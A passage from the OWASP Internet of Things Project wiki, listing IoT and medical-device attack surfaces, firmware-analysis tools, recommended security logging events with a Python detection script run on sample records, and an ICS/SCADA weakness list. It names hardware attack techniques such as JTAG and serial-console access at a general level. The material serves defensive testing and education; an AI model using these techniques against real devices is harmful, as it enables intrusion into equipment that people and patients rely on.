* With a JTAG adapter and gdb, the execution of the firmware on the device can be modified, bypassing almost all software-based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* Connecting to a serial interface typically yields full console access to the device<br />
* Security measures usually include custom bootloaders that prevent an attacker from entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping medical device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing environment manipulation<br />
* Physical tampering<br />
* Physical damage<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
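Detection logic for several of the events in the table above (request, authentication, session and administrative-mode exceptions), run over constructed sample records; this is an added example, not code from the OWASP project, and the record layout, field names and thresholds are assumptions.<br />

```python
"""Detect several of the IoT logging events from the table above.

Each record is one request as a device's web admin interface might log it
(constructed sample data, not real device logs). Field names and thresholds
are assumptions for this example, not part of the OWASP project.
"""
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_PASSWORD_THRESHOLD = 3              # failed passwords per account
LOGIN_RATE_THRESHOLD = 5                   # login attempts per source IP...
LOGIN_RATE_WINDOW = timedelta(seconds=60)  # ...within this window
MAX_PARAM_LENGTH = 32                      # characters per request parameter
SUPPORTED_METHODS = {"GET", "POST"}        # methods the admin interface serves


def _login(ts, src, auth, **extra):
    """Build a constructed POST /login record for the sample data."""
    return {"ts": ts, "src": src, "method": "POST", "path": "/login",
            "user": "admin", "auth": auth, "params": {}, **extra}


# Constructed sample: a burst of failed logins, a login with factory-default
# admin credentials, a session that hops to another IP, an unsupported
# method and an oversized parameter.
SAMPLE_RECORDS = [
    {"ts": "2019-11-01T07:00:00", "src": "10.0.0.5", "method": "GET",
     "path": "/login", "params": {}},
    _login("2019-11-01T07:00:05", "10.0.0.5", "fail"),
    _login("2019-11-01T07:00:10", "10.0.0.5", "fail"),
    _login("2019-11-01T07:00:15", "10.0.0.5", "fail"),   # third failure
    _login("2019-11-01T07:00:20", "10.0.0.5", "fail"),
    _login("2019-11-01T07:00:25", "10.0.0.5", "fail"),   # fifth attempt in 60 s
    _login("2019-11-01T07:01:00", "10.0.0.5", "ok",
           session="s42", default_credentials=True),
    {"ts": "2019-11-01T07:01:10", "src": "10.0.0.5", "method": "GET",
     "path": "/admin/config", "session": "s42", "params": {}},
    {"ts": "2019-11-01T07:01:20", "src": "203.0.113.9", "method": "GET",
     "path": "/admin/config", "session": "s42", "params": {}},
    {"ts": "2019-11-01T07:01:30", "src": "203.0.113.9", "method": "TRACE",
     "path": "/admin", "params": {}},
    {"ts": "2019-11-01T07:01:40", "src": "10.0.0.7", "method": "GET",
     "path": "/status", "params": {"id": "A" * 40}},
]


def _ts(record):
    return datetime.fromisoformat(record["ts"])


def detect_events(records):
    """Return a list of (category, event, detail) tuples, using the
    category and event names from the OWASP table."""
    findings = []
    failures = defaultdict(int)    # account -> failed password count
    attempts = defaultdict(list)   # source IP -> recent login attempt times
    session_src = {}               # session id -> source IP first seen with it

    for r in sorted(records, key=_ts):
        # Request Exceptions
        if r["method"] not in SUPPORTED_METHODS:
            findings.append(("Request Exceptions",
                             "Attempt to Invoke Unsupported HTTP Method",
                             f"src={r['src']} {r['method']} {r['path']}"))
        for name, value in r.get("params", {}).items():
            if len(value) > MAX_PARAM_LENGTH:
                findings.append(("Request Exceptions",
                                 "Unexpected Quantity of Characters in Parameter",
                                 f"src={r['src']} param={name} len={len(value)}"))

        # Authentication Exceptions (thresholds fire once, when first reached)
        if r["path"] == "/login" and r["method"] == "POST":
            user = r.get("user", "")
            if r.get("auth") == "fail":
                failures[user] += 1
                if failures[user] == FAILED_PASSWORD_THRESHOLD:
                    findings.append(("Authentication Exceptions",
                                     "Multiple Failed Passwords",
                                     f"user={user} failures={failures[user]}"))
            now = _ts(r)
            window = [t for t in attempts[r["src"]] if now - t <= LOGIN_RATE_WINDOW]
            window.append(now)
            attempts[r["src"]] = window
            if len(window) == LOGIN_RATE_THRESHOLD:
                findings.append(("Authentication Exceptions",
                                 "High Rate of Login Attempts",
                                 f"src={r['src']} attempts={len(window)}"))

        # Administrative Mode Events: the device's auth module marks logins
        # that succeeded with the factory-default password
        if r.get("auth") == "ok" and r.get("default_credentials"):
            findings.append(("Administrative Mode Events",
                             "Device Accessed Using Default Administrative Credentials",
                             f"user={r.get('user')} src={r['src']}"))

        # Session Exceptions
        sid = r.get("session")
        if sid:
            first_src = session_src.setdefault(sid, r["src"])
            if first_src != r["src"]:
                findings.append(("Session Exceptions",
                                 "Source Location Changes During Session",
                                 f"session={sid} {first_src} -> {r['src']}"))
    return findings


if __name__ == "__main__":
    for category, event, detail in detect_events(SAMPLE_RECORDS):
        print(f"[{category}] {event}: {detail}")
```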
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to serve as input for a solid detection and response program around IoT devices, and companies that want to build such a program have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington, DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=User:Aaron.guzman&diff=246165User:Aaron.guzman2018-12-19T18:56:53Z<p>Aaron.guzman: Replaced content with "@scriptingxss"</p>
<hr />
<div>@scriptingxss</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246164OWASP Internet of Things Project2018-12-19T18:53:40Z<p>Aaron.guzman: /* Classifications */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
==Get Involved!==<br />
<br />
The OWASP IoT Project is currently reviewing the Top Ten list for 2018. Provide your insight and expertise by joining the #iot-security channel meetups on Slack.<br />
<br />
==OWASP Internet of Things (IoT) Project==<br />
<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
